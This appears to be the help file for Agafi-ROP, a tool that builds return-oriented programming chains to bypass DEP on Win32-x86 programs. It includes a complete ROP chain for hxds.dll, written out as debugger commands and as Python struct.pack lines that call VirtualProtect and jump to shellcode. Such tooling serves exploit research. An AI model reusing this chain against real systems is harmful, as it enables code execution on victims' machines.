-------------------------------------------------------------------------------------------------------

*** Agafi-ROP: A ROP-Chainer tool for Win32-x86 programs ***

A little help for you ...

-------------------------------------------------------------------------------------------------------

First at all, remember to download "distorm3.dll" from "https://code.google.com/p/distorm/downloads/detail?name=distorm3-3-dlls.zip"
Then, copy the 32 bit version at the current Agafi path.

-------------------------------------------------------------------------------------------------------

Building a ROP-Chain:
  The gadget-finder used by this tool is "Agafi.exe".
  This tool uses the PUSHAD/RET technique to build ROP-Chains to bypass DEP.
  For now, only ROP-Chains jumping to the "kernel32.VirtualProtect" function are supported.

-------------------------------------------------------------------------------------------------------

Building a ROP-Chain to "hxds.dll" (v2.5.50727.198)

Use example:
  line in "settings.txt": "invalid_chars = 0x00"
  cmd: "agafi-rop -f hxds.dll settings.txt"

Output:
  sections_number = 5
  [x] Setting image base at: 51bd0000
  [x] Starting process
  [x] Module name: hxds.dll
  [x] Module base = 51bd0000
  [x] WRITABLE SECTION = 51c5b000 - 51c60270
  [x] IAT.VirtualProtect = 51bd1158

  Agafi Finding gadgets ...

  [x] NOT-NEG/RET gadgets found: 11
  [x] PUSHAD/RET gadgets found: 18
  [x] REG32=REG32/RET gadgets found: 2358
  [x] POP REG/RET gadgets found: 8269
  [x] REG=[MEM]/RET gadgets found: 84
  [x] JMP ESPs gadgets found: 46

  NTSD OUTPUT !
  eb eip c3
  ed esp+00 0x51bec8b6
  ed esp+04 0x51bd1158
  ed esp+08 0x51c055ac
  ed esp+0c 0x51c39648
  ed esp+10 0x51bd1a30
  ed esp+14 0x51bd1a30
  ed esp+18 0x51bec8b6
  ed esp+1c 0xfffffffc
  ed esp+20 0x51c1df88
  ed esp+24 0x51bd5737
  ed esp+28 0x51bec8b6
  ed esp+2c 0xffffffc0
  ed esp+30 0x51c1df88
  ed esp+34 0x51c08b65
  ed esp+38 0x51bd2731
  ed esp+3c 0x51c6026c
  ed esp+40 0x51bd1aae
  ed esp+44 0x51c0a4ed
  ed esp+48 0x51c0a4ec
  ed esp+4c 0x51c4a9f3
  ed esp+50 0xcccccccc

  rop_chain  = ""
  rop_chain += struct.pack ("I",0x51bec8b6) # "pop eax/ret"
  rop_chain += struct.pack ("I",0x51bd1158) # IAT.VirtualProtect ADDRESS
  rop_chain += struct.pack ("I",0x51c055ac) # "mov eax,[eax+0x00]/ret"
  rop_chain += struct.pack ("I",0x51c39648) # "xchg esi,eax/ret"
  rop_chain += struct.pack ("I",0x51bd1a30) # "pop ebp/ret"
  rop_chain += struct.pack ("I",0x51bd1a30) # "ADD ESP,4/RET"
  rop_chain += struct.pack ("I",0x51bec8b6) # "pop eax/ret"
  rop_chain += struct.pack ("I",0xfffffffc) # REGION SIZE
  rop_chain += struct.pack ("I",0x51c1df88) # "not eax/ret"
  rop_chain += struct.pack ("I",0x51bd5737) # "xchg ebx,eax/ret"
  rop_chain += struct.pack ("I",0x51bec8b6) # "pop eax/ret"
  rop_chain += struct.pack ("I",0xffffffc0) # PROTECTION
  rop_chain += struct.pack ("I",0x51c1df88) # "not eax/ret"
  rop_chain += struct.pack ("I",0x51c08b65) # "xchg edx,eax/ret"
  rop_chain += struct.pack ("I",0x51bd2731) # "pop ecx/ret"
  rop_chain += struct.pack ("I",0x51c6026c) # WRITABLE ADDRESS
  rop_chain += struct.pack ("I",0x51bd1aae) # "pop edi/ret"
  rop_chain += struct.pack ("I",0x51c0a4ed) # "RET NOP"
  rop_chain += struct.pack ("I",0x51c0a4ec) # "pushad/ret"
  rop_chain += struct.pack ("I",0x51c4a9f3) # "jmp esp"
  rop_chain += struct.pack ("I",0xcccccccc) # SHELLCODE ...

-------------------------------------------------------------------------------------------------------

Options supported:

Use: Agafi-rop option [settings.txt]

Options:
 -f module_name
 -rf module_name
 -p pid
 -rp pid
 -s agafi_snapshot
 -rs agafi_snapshot

Note:
 -r means reuse gadgets

-------------------------------------------------------------------------------------------------------

Supported settings in settings.txt:

Setting invalid chars:
 invalid_chars = 0x00,0x01,0x02,...,0xff
 modules=MODULE1, MODULE2, ...

Besides, you can pass parameters (not objectives) directly to Agafi, like this:
 eax=0x12345678
 test_range=0x401000,0x402000

-------------------------------------------------------------------------------------------------------
